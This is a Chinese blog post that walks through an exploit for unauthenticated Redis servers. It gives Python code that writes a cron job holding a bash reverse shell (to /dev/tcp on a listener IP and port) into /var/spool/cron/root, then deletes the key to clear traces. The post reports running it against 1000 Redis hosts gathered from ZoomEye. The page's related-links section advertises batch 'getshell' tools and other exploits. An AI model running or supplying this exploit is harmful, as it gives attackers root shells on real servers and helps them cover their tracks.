Redis Getshell自动化实践之cron

最新推荐文章于 2024-06-13 15:07:08 发布
最新推荐文章于 2024-06-13 15:07:08 发布
阅读量4.1k 收藏 1
点赞数
分类专栏: 渗透测试 文章标签: redis shell 自动化 数据 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cd_xuyue/article/details/51982063
版权

利用流程

1 通过redis未授权访问漏洞,向redis插入一条记录,内容是反弹shell的定时任务
2 通过redis数据导出功能,将含有定时任务代码的数据导出到/var/spool/cron/root
3 监听端口,获取shell

编写exp

完整代码:
https://github.com/Xyntax/POC-T/blob/master/script/redis-cron-getshell.py

和之前的ssh-key相比简单了点.

首先判断是否存在未授权访问

r = redis.Redis(host=ip, port=port, db=0, socket_timeout=10)
if 'redis_version' in r.info():

构造定时任务代码

listen_ip = '115.28.1.1'
listen_port = 9999

payload = '\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/{ip}/{port} 0>&1\n\n'.format(ip=listen_ip,port=str(listen_port))

写入/var/spool/cron/root

path = '/var/spool/cron'
name = 'root'
key = randomString(10)
r.set(key, payload)
r.config_set('dir', path)
r.config_set('dbfilename', name)
r.save()

清除痕迹

r.delete(key)
r.config_set('dir', '/tmp')

这里没有验证是否真正能反弹,如果有需要的话可以把定时任务代码改成ping,然后使用cloudeye(api已集成到工具中)等dns日志工具做验证.

测试

加载1000个ZoomEye采集的redis站点,也可以使用--api --dork参数直接从ZoomEye采集

测试结果

然后监听端口,一会就会有shell自动连过来

1

看下我们之前写入的文件

2

Xyntax
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
redis_cron:受pg_cron启发的Cron Job Scheduler Redis模块
03-06
redis_cron redis_cronRedis一个基于cron表达式的简单作业调度程序,它在redis中作为模块运行。 它使用与常规cron相似的语法,并允许您直接在redis上调度redis命令。 这个项目的灵感来自PostgreSQL扩展 。 由于redis命令只能在redis中一次由一个线程运行,因此redis_cron在单个线程中按顺序运行计划的作业。 安装 $ cargo build $ # Mac: $ redis-server --loadmodule ./target/debug/libredis_cron.dylib $ # Linux: $ redis-server --loadmodule ./target/debug/libredis_cron.so 用法 可用命令: CRON.SCHEDULE <cron> <redis-com
discuz-getshell-auto-method2:Discuz 全自动GetShell 方法#2
05-11
Discuz 全自动 GetShell 本方法比写 config_ucenter.php 更加稳定,而且不易出错 用法 打开 dzhack.php, 找到 $webshell = '<?php phpinfo(); ?>'; list ($status, $data) = $dz->hack ( 'http://ubuntu64/dz/', 'K856C548X2xaTcDdc248I1pc57gdq4vdL2SdH3ifGd4a0ec6UdcfX0B7m9Ubrcs4', ... ); 先把第一行 $webshell 的内容改了,不需要考虑编码问题, 然后修改 hack 函数的参数,第一个为 discuz 的起始路径,第二行为你找到的 UC_KEY 然后执行 php dzhack.php, 会在 data/client.php 下面生成一个 webshell, ![Sc
Redis服务器(二)-serverCron函数
星光之子的博客
09-27 395
serverCron函数概述更新服务器时间缓存更新LRU时钟更新 服务器 每秒执行命令次数更新 服务器(的)内存峰值记录处理SIGTERM信号管理客户端资源管理数据库资源行被延迟的BGREWRITEAOF检查持久化操作的运行状态将AOF缓冲区中的内容写入AOF文件关闭异步客户端增加cronloops计数器的值 概述 Redis服务器中的serverCron函数默认每隔100毫秒执行一次 这个函数负责管理服务器的资源,并保持服务器自身的良好运转 更新服务器时间缓存 Redis服务器中 有不少功能 需要 获取系
redis未授权getshell整合利用
最新发布
qq_40898302的博客
06-13 1206
redis未授权getshell四种方式
MetInfo 5.1 自动化getshell工具
weixin_30670151的博客
12-30 247
title: MetInfo V5.1 GetShell一键化工具 date: 2016-06-08 22:40:32 categories: Hacker tags: - Hacker - Tools --- ---------- # 漏洞解析: ---------- **config/config.inc.php** ```php $langoks = ...
cron表达式
技术博客
01-11 401
一,简介        cron表达式是linux系统定时任务执行的一个标准规范。按照cron表达式语法,我们可以定制任务触发执行的时间点。 二,cron表达式语法        顺序单位:   秒     分     时     日     月     周      年(一般省略不写)        * :使用星号(*) 指示着这个单位域上包含所有合法的值。例如,在月份域上使用*意味...
自动化部署Redis Shell脚本
01-04
本文将详细讲解如何使用Shell脚本来自动化部署Redis 6.2.0。 首先,确保你的服务器环境已经安装了基础的依赖,如GCC编译器、Make工具等,因为Redis源码安装需要这些工具。可以通过以下命令检查: ```bash sudo apt...
mysql+redis自动化部署
04-01
本文将深入探讨如何通过"mysql+redis自动化部署"实现高效的数据存储与管理。这个过程主要涉及MySQL关系型数据库和Redis内存数据存储的安装与配置,尤其适用于Windows 10操作系统。 标题中的"mysql+redis自动化...
redis6.2主从集群自动化配置脚本
04-01
附件包含redis6.2软件和自动化配置脚本,在主节点运行redis-m.sh,在从节点运行./redis-s.sh masterip,默认是6主6从,可以通过修改脚本配置修改主从节点数量,另外运行前请修改脚本中网卡名称,脚本默认网卡名为ens...
redis 自动化脚本部署
07-15
在大型分布式系统中,自动化部署Redis能够显著提高效率,确保系统的稳定性和可扩展性。本文将详细介绍如何编写和执行Redis自动化部署脚本。 一、环境准备 在开始自动化部署之前,我们需要确保目标服务器具备以下...
Redis自动化安装及集群实现搭建过程
09-09
在本文中,我们将深入探讨如何进行Redis自动化安装以及如何搭建Redis集群。Redis是一个高性能的键值存储系统,常用于缓存、数据库和消息中间件等场景。自动化安装和集群搭建对于大型项目和生产环境尤其重要,因为...
dz7.2一键getshell
07-22
dz7.2一键getshell,python脚本,亲测成功
天羽全自动getshell工具VIP版.zip
09-25
天羽全自动getshell工具VIP版,批量getshell工具,超级好用!!大家下载试试吧!!效果不错哦!!
HM收割机一建getshell
02-22
懂得人自然懂 不懂得当然不懂 纯自动化 关键词 排名 拿shel l一键getshell
批量getshell教程+工具
07-28
批量getshell教程+工具
批量getshell工具全自动_绝大多数人都不知道的电商工具,不会美工不会写文案照样能做淘宝...
weixin_39598584的博客
11-04 418
做电商不会写文案 也不会美工怎么办呢? 很简单,首先进入我们的千牛然后打开千牛的卖家工作台 点击这个店铺管理然后找到里面的智能设计然后你就可以看到这个智能设计工作台,里面的设计工具会出现四个。1.顽兔抠图电商图片处理专家,可以快速进行抠图处理轻松几步就能完成图片批量处理,节约您80%的图片处理时间。 2 鹿班设计拥有三种功能:1.店铺点击优化(网页店面智能运营) 一键生成整套模板、支持全店一键装修...
全自动批量web拿shell工具【2023最新】
05-13 703
全自动批量web拿shell工具【2023最新】这是一种内部有多个漏洞,可自动进行url采集,自动爬虫多个引擎和友情链接url,过狗一句话,轻松日出上千。
批量getshell工具全自动_向阳全自动糊合机型号齐全
weixin_39531183的博客
10-26 208
向阳全自动糊合机型号齐全 鄞州包装机械厂是一家专业制造纸包装机械的企业,公司聚集了众多国内纸包装机械的专业人才,拥有雄厚的技术力量,良好的工艺装备,齐全的检测手段,完善的质量管理体制。公司本着“传承,创新,超越,奉献”的企业精神,以“质量是生命,诚信是保证,服务是永恒”的经营理念们将不断加大糊盒机产品研发力量、不断创新、不断超越自己,用优质的产品与良好的服务,为印刷包装事业的发展,奉献一份力量。...
批量getshell工具全自动_【技巧1001-19】- 文件管理升级-全自动更新版
weixin_39564831的博客
11-14 369
今天我们分享办公实战技巧19,关于文件管理,前面我们是有介绍了一篇,方法也是比较简单方便,是否临时的文件管理,不管没有办法实现文件新增和删除以及添加子文件更的问题,所以有了今天这篇,全自动更新升级版文件管理,值得说的是非常简单​简单好用的文件管理:【技巧1001-4】-批量提取文件名并建立超链接可以筛选的文件管理:Excel版本动态可筛选的文件管理器文件通用管理模板(VBA):分享|文件管理模板以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值